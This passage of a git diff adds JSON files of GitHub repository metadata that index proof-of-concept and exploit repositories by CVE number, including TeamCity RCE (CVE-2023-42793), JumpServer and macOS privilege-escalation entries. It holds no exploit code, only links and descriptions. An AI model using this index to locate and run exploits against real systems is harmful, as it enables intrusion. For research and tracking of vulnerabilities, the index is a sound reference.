b/2023/CVE-2023-42362.json @@ -0,0 +1,33 @@ +[ + { + "id": 690513360, + "name": "CVE-2023-42362", + "full_name": "Mr-n0b3dy\/CVE-2023-42362", + "owner": { + "login": "Mr-n0b3dy", + "id": 144795381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144795381?v=4", + "html_url": "https:\/\/github.com\/Mr-n0b3dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-n0b3dy\/CVE-2023-42362", + "description": null, + "fork": false, + "created_at": "2023-09-12T10:46:12Z", + "updated_at": "2023-09-13T12:17:19Z", + "pushed_at": "2023-09-13T22:38:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42413.json b/2023/CVE-2023-42413.json new file mode 100644 index 0000000000..d75f727a99 --- /dev/null +++ b/2023/CVE-2023-42413.json @@ -0,0 +1,33 @@ +[ + { + "id": 695761286, + "name": "cve-2023-42413", + "full_name": "chenghao-hao\/cve-2023-42413", + "owner": { + "login": "chenghao-hao", + "id": 73655831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73655831?v=4", + "html_url": "https:\/\/github.com\/chenghao-hao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenghao-hao\/cve-2023-42413", + "description": "ecology_9_sql ", + "fork": false, + "created_at": "2023-09-24T06:17:33Z", + "updated_at": "2023-09-24T06:17:34Z", + "pushed_at": "2023-09-24T06:17:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42426.json b/2023/CVE-2023-42426.json new file mode 100644 index 0000000000..c99606b06c --- /dev/null +++ b/2023/CVE-2023-42426.json @@ -0,0 +1,33 @@ +[ + { + "id": 695777958, + "name": "CVE-2023-42426", + "full_name": "b0marek\/CVE-2023-42426", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-42426", + "description": "Repository for CVE-2023-42426 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T07:34:05Z", + "updated_at": "2023-09-24T07:53:46Z", + "pushed_at": "2023-09-24T07:59:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42442.json b/2023/CVE-2023-42442.json new file mode 100644 index 0000000000..4cdc391d70 --- /dev/null +++ b/2023/CVE-2023-42442.json @@ -0,0 +1,99 @@ +[ + { + "id": 697118433, + "name": "CVE-2023-42442", + "full_name": "HolyGu\/CVE-2023-42442", + "owner": { + "login": "HolyGu", + "id": 28488437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28488437?v=4", + "html_url": "https:\/\/github.com\/HolyGu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HolyGu\/CVE-2023-42442", + "description": null, + "fork": false, + "created_at": "2023-09-27T05:09:20Z", + "updated_at": "2024-11-16T19:50:51Z", + "pushed_at": "2023-10-12T05:03:19Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 41, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704850042, + "name": "blackjump", + "full_name": "tarihub\/blackjump", + "owner": { + "login": "tarihub", + "id": 39155974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39155974?v=4", + "html_url": "https:\/\/github.com\/tarihub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarihub\/blackjump", + "description": "JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 \/ CVE-2023-42820 \/ RCE 2021", + "fork": false, + "created_at": "2023-10-14T09:35:07Z", + "updated_at": "2025-01-07T07:22:40Z", + "pushed_at": "2024-05-16T07:42:00Z", + "stargazers_count": 225, + "watchers_count": 225, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42442", + "cve-2023-42820", + "jumpserver" + ], + "visibility": "public", + "forks": 23, + "watchers": 225, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 707591805, + "name": "CVE-2023-42442", + "full_name": "C1ph3rX13\/CVE-2023-42442", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42442", + "description": "CVE-2023-42442 JumpServer Session 录像任意下载漏洞", + "fork": false, + "created_at": "2023-10-20T08:33:17Z", + "updated_at": "2024-08-28T02:59:06Z", + "pushed_at": "2023-10-31T06:18:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42468.json b/2023/CVE-2023-42468.json new file mode 100644 index 0000000000..8877d2149f --- /dev/null +++ b/2023/CVE-2023-42468.json @@ -0,0 +1,35 @@ +[ + { + "id": 686365585, + "name": "com.cutestudio.colordialer", + "full_name": "actuator\/com.cutestudio.colordialer", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.cutestudio.colordialer", + "description": "CVE-2023-42468", + "fork": false, + "created_at": "2023-09-02T14:48:07Z", + "updated_at": "2023-09-11T21:00:49Z", + "pushed_at": "2023-12-27T01:05:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42468" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42469.json b/2023/CVE-2023-42469.json new file mode 100644 index 0000000000..19f06a643c --- /dev/null +++ b/2023/CVE-2023-42469.json @@ -0,0 +1,33 @@ +[ + { + "id": 686403164, + "name": "com.full.dialer.top.secure.encrypted", + "full_name": "actuator\/com.full.dialer.top.secure.encrypted", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.full.dialer.top.secure.encrypted", + "description": "CVE-2023-42469", + "fork": false, + "created_at": "2023-09-02T17:11:58Z", + "updated_at": "2023-09-11T20:59:02Z", + "pushed_at": "2023-12-26T22:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42470.json b/2023/CVE-2023-42470.json new file mode 100644 index 0000000000..8bc522cfdd --- /dev/null +++ b/2023/CVE-2023-42470.json @@ -0,0 +1,36 @@ +[ + { + "id": 679505307, + "name": "imou", + "full_name": "actuator\/imou", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/imou", + "description": "CVE-2023-42470 | CVE-2023-47353", + "fork": false, + "created_at": "2023-08-17T02:12:24Z", + "updated_at": "2024-08-20T13:25:00Z", + "pushed_at": "2024-08-20T13:24:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42470", + "cve-2023-47353" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42471.json b/2023/CVE-2023-42471.json new file mode 100644 index 0000000000..aa478c1e64 --- /dev/null +++ b/2023/CVE-2023-42471.json @@ -0,0 +1,33 @@ +[ + { + "id": 683940293, + "name": "wave.ai.browser", + "full_name": "actuator\/wave.ai.browser", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/wave.ai.browser", + "description": "CVE-2023-42471", + "fork": false, + "created_at": "2023-08-28T05:34:04Z", + "updated_at": "2023-09-11T20:59:38Z", + "pushed_at": "2023-11-14T14:45:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4278.json b/2023/CVE-2023-4278.json new file mode 100644 index 0000000000..659c162ba7 --- /dev/null +++ b/2023/CVE-2023-4278.json @@ -0,0 +1,33 @@ +[ + { + "id": 687060459, + "name": "CVE-2023-4278", + "full_name": "revan-ar\/CVE-2023-4278", + "owner": { + "login": "revan-ar", + "id": 45234012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45234012?v=4", + "html_url": "https:\/\/github.com\/revan-ar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/revan-ar\/CVE-2023-4278", + "description": "Wordpress Plugin Masterstudy LMS <= 3.0.17 - Unauthenticated Instructor Account Creation.", + "fork": false, + "created_at": "2023-09-04T14:16:32Z", + "updated_at": "2024-03-21T15:02:13Z", + "pushed_at": "2023-09-04T17:01:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42789.json b/2023/CVE-2023-42789.json new file mode 100644 index 0000000000..1bddd7edd1 --- /dev/null +++ b/2023/CVE-2023-42789.json @@ -0,0 +1,33 @@ +[ + { + "id": 778714358, + "name": "CVE-2023-42789", + "full_name": "jhonnybonny\/CVE-2023-42789", + "owner": { + "login": "jhonnybonny", + "id": 87495218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87495218?v=4", + "html_url": "https:\/\/github.com\/jhonnybonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jhonnybonny\/CVE-2023-42789", + "description": "Check CVE-2023-42789 ", + "fork": false, + "created_at": "2024-03-28T08:59:12Z", + "updated_at": "2024-03-28T09:03:10Z", + "pushed_at": "2024-03-28T09:10:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4279.json b/2023/CVE-2023-4279.json new file mode 100644 index 0000000000..b8d7bcf42b --- /dev/null +++ b/2023/CVE-2023-4279.json @@ -0,0 +1,33 @@ +[ + { + "id": 695790223, + "name": "CVE-2023-4279", + "full_name": "b0marek\/CVE-2023-4279", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4279", + "description": "Repository for CVE-2023-4279 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:26:37Z", + "updated_at": "2023-09-24T08:26:37Z", + "pushed_at": "2023-09-24T08:35:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42793.json b/2023/CVE-2023-42793.json new file mode 100644 index 0000000000..79fb6f122c --- /dev/null +++ b/2023/CVE-2023-42793.json @@ -0,0 +1,358 @@ +[ + { + "id": 698097705, + "name": "CVE-2023-42793", + "full_name": "H454NSec\/CVE-2023-42793", + "owner": { + "login": "H454NSec", + "id": 127287794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127287794?v=4", + "html_url": "https:\/\/github.com\/H454NSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H454NSec\/CVE-2023-42793", + "description": "JetBrains TeamCity Authentication Bypass CVE-2023-42793 Exploit", + "fork": false, + "created_at": "2023-09-29T06:43:35Z", + "updated_at": "2024-12-06T09:40:36Z", + "pushed_at": "2024-05-22T16:07:18Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42793", + "exploit", + "poc", + "teamcity" + ], + "visibility": "public", + "forks": 14, + "watchers": 44, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 700903844, + "name": "CVE-2023-42793", + "full_name": "whoamins\/CVE-2023-42793", + "owner": { + "login": "whoamins", + "id": 66217512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66217512?v=4", + "html_url": "https:\/\/github.com\/whoamins", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whoamins\/CVE-2023-42793", + "description": null, + "fork": false, + "created_at": "2023-10-05T14:17:35Z", + "updated_at": "2024-09-20T09:34:58Z", + "pushed_at": "2023-10-23T20:42:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 701008513, + "name": "CVE-2023-42793", + "full_name": "Zenmovie\/CVE-2023-42793", + "owner": { + "login": "Zenmovie", + "id": 98185655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98185655?v=4", + "html_url": "https:\/\/github.com\/Zenmovie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zenmovie\/CVE-2023-42793", + "description": "PoC of CVE-2023-42793", + "fork": false, + "created_at": "2023-10-05T18:12:25Z", + "updated_at": "2024-10-30T06:55:54Z", + "pushed_at": "2023-10-11T11:40:05Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740232498, + "name": "CVE-2023-42793_POC", + "full_name": "johnossawy\/CVE-2023-42793_POC", + "owner": { + "login": "johnossawy", + "id": 78561981, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78561981?v=4", + "html_url": "https:\/\/github.com\/johnossawy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/johnossawy\/CVE-2023-42793_POC", + "description": null, + "fork": false, + "created_at": "2024-01-07T22:29:18Z", + "updated_at": "2024-01-08T18:21:55Z", + "pushed_at": "2024-01-08T18:21:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 743548847, + "name": "GhostTown", + "full_name": "StanleyJobsonAU\/GhostTown", + "owner": { + "login": "StanleyJobsonAU", + "id": 123927299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123927299?v=4", + "html_url": "https:\/\/github.com\/StanleyJobsonAU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StanleyJobsonAU\/GhostTown", + "description": "Proof of Concept script to exploit CVE-2023-42793 (TeamCity)", + "fork": false, + "created_at": "2024-01-15T13:25:49Z", + "updated_at": "2024-02-25T06:43:21Z", + "pushed_at": "2024-01-15T13:26:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789764349, + "name": "CVE-2023-42793", + "full_name": "hotplugin0x01\/CVE-2023-42793", + "owner": { + "login": "hotplugin0x01", + "id": 57496383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57496383?v=4", + "html_url": "https:\/\/github.com\/hotplugin0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotplugin0x01\/CVE-2023-42793", + "description": "JetBrains TeamCity Unauthenticated Remote Code Execution - Python3 Implementation", + "fork": false, + "created_at": "2024-04-21T13:52:28Z", + "updated_at": "2024-05-06T10:15:51Z", + "pushed_at": "2024-05-06T10:15:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791394288, + "name": "CVE-2023-42793", + "full_name": "Zyad-Elsayed\/CVE-2023-42793", + "owner": { + "login": "Zyad-Elsayed", + "id": 52281871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52281871?v=4", + "html_url": "https:\/\/github.com\/Zyad-Elsayed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zyad-Elsayed\/CVE-2023-42793", + "description": "JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793", + "fork": false, + "created_at": "2024-04-24T16:33:20Z", + "updated_at": "2024-12-29T12:40:08Z", + "pushed_at": "2024-04-24T23:10:27Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-42793", + "exploit", + "htb", + "jetbrains", + "poc", + "rce", + "runner", + "shell", + "teamcity" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 806358142, + "name": "CVE-2023-42793", + "full_name": "junnythemarksman\/CVE-2023-42793", + "owner": { + "login": "junnythemarksman", + "id": 20056452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4", + "html_url": "https:\/\/github.com\/junnythemarksman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2023-42793", + "description": "TeamCity CVE-2023-42793 exploit written in Rust", + "fork": false, + "created_at": "2024-05-27T03:31:57Z", + "updated_at": "2024-05-27T05:38:39Z", + "pushed_at": "2024-05-27T05:38:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824689719, + "name": "CVE-2023-42793", + "full_name": "HusenjanDev\/CVE-2023-42793", + "owner": { + "login": "HusenjanDev", + "id": 88688451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88688451?v=4", + "html_url": "https:\/\/github.com\/HusenjanDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HusenjanDev\/CVE-2023-42793", + "description": "TeamCity RCE for Linux (CVE-2023-42793)", + "fork": false, + "created_at": "2024-07-05T17:39:25Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-05T17:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847041001, + "name": "CVE-2023-42793", + "full_name": "FlojBoj\/CVE-2023-42793", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2023-42793", + "description": "TeamCity CVE-2023-42793 RCE (Remote Code Execution)", + "fork": false, + "created_at": "2024-08-24T17:17:21Z", + "updated_at": "2024-08-25T20:58:50Z", + "pushed_at": "2024-08-25T20:58:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860426530, + "name": "teamcity-exploit-cve-2023-42793", + "full_name": "SwiftSecur\/teamcity-exploit-cve-2023-42793", + "owner": { + "login": "SwiftSecur", + "id": 177733389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177733389?v=4", + "html_url": "https:\/\/github.com\/SwiftSecur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SwiftSecur\/teamcity-exploit-cve-2023-42793", + "description": "teamcity-exploit-cve-2023-42793", + "fork": false, + "created_at": "2024-09-20T12:15:25Z", + "updated_at": "2024-11-06T14:05:38Z", + "pushed_at": "2024-11-06T14:05:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4281.json b/2023/CVE-2023-4281.json new file mode 100644 index 0000000000..d9d740203b --- /dev/null +++ b/2023/CVE-2023-4281.json @@ -0,0 +1,33 @@ +[ + { + "id": 695848699, + "name": "CVE-2023-4281", + "full_name": "b0marek\/CVE-2023-4281", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4281", + "description": "Repository for CVE-2023-4281 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T12:21:19Z", + "updated_at": "2023-09-24T12:21:19Z", + "pushed_at": "2023-09-24T12:27:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42819.json b/2023/CVE-2023-42819.json new file mode 100644 index 0000000000..8eb777e800 --- /dev/null +++ b/2023/CVE-2023-42819.json @@ -0,0 +1,33 @@ +[ + { + "id": 703955293, + "name": "CVE-2023-42819", + "full_name": "C1ph3rX13\/CVE-2023-42819", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42819", + "description": "CVE-2023-42819", + "fork": false, + "created_at": "2023-10-12T08:45:46Z", + "updated_at": "2024-07-31T07:23:36Z", + "pushed_at": "2023-12-28T07:05:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42820.json b/2023/CVE-2023-42820.json new file mode 100644 index 0000000000..afaed7f90c --- /dev/null +++ b/2023/CVE-2023-42820.json @@ -0,0 +1,64 @@ +[ + { + "id": 702854511, + "name": "CVE-2023-42820", + "full_name": "C1ph3rX13\/CVE-2023-42820", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-42820", + "description": "CVE-2023-42820", + "fork": false, + "created_at": "2023-10-10T06:32:51Z", + "updated_at": "2025-01-07T07:22:48Z", + "pushed_at": "2024-04-03T09:57:07Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 56, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703323724, + "name": "cve-2023-42820", + "full_name": "Startr4ck\/cve-2023-42820", + "owner": { + "login": "Startr4ck", + "id": 53632236, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53632236?v=4", + "html_url": "https:\/\/github.com\/Startr4ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Startr4ck\/cve-2023-42820", + "description": "JumpServer ", + "fork": false, + "created_at": "2023-10-11T03:15:30Z", + "updated_at": "2024-01-18T12:33:14Z", + "pushed_at": "2023-10-12T08:16:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42860.json b/2023/CVE-2023-42860.json new file mode 100644 index 0000000000..5636de0adb --- /dev/null +++ b/2023/CVE-2023-42860.json @@ -0,0 +1,41 @@ +[ + { + "id": 784286642, + "name": "CVE-2023-42860", + "full_name": "Trigii\/CVE-2023-42860", + "owner": { + "login": "Trigii", + "id": 95245480, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95245480?v=4", + "html_url": "https:\/\/github.com\/Trigii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trigii\/CVE-2023-42860", + "description": "Exploit for CVE-2023-42860", + "fork": false, + "created_at": "2024-04-09T14:53:46Z", + "updated_at": "2024-10-22T16:54:08Z", + "pushed_at": "2024-09-12T16:55:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apple", + "exploit", + "fda", + "macos", + "root", + "sip", + "tcc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42931.json b/2023/CVE-2023-42931.json new file mode 100644 index 0000000000..3228662a26 --- /dev/null +++ b/2023/CVE-2023-42931.json @@ -0,0 +1,33 @@ +[ + { + "id": 777701876, + "name": "CVE-2023-42931", + "full_name": "d0rb\/CVE-2023-42931", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-42931", + "description": "The exploit targets a critical privilege escalation vulnerability in macOS versions Monterey, Ventura, and Sonoma.", + "fork": false, + "created_at": "2024-03-26T11:01:54Z", + "updated_at": "2024-10-22T16:52:49Z", + "pushed_at": "2024-03-26T17:16:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4294.json b/2023/CVE-2023-4294.json new file mode 100644 index 0000000000..3a65a4d517 --- /dev/null +++ b/2023/CVE-2023-4294.json @@ -0,0 +1,33 @@ +[ + { + "id": 695816825, + "name": "CVE-2023-4294", + "full_name": "b0marek\/CVE-2023-4294", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": 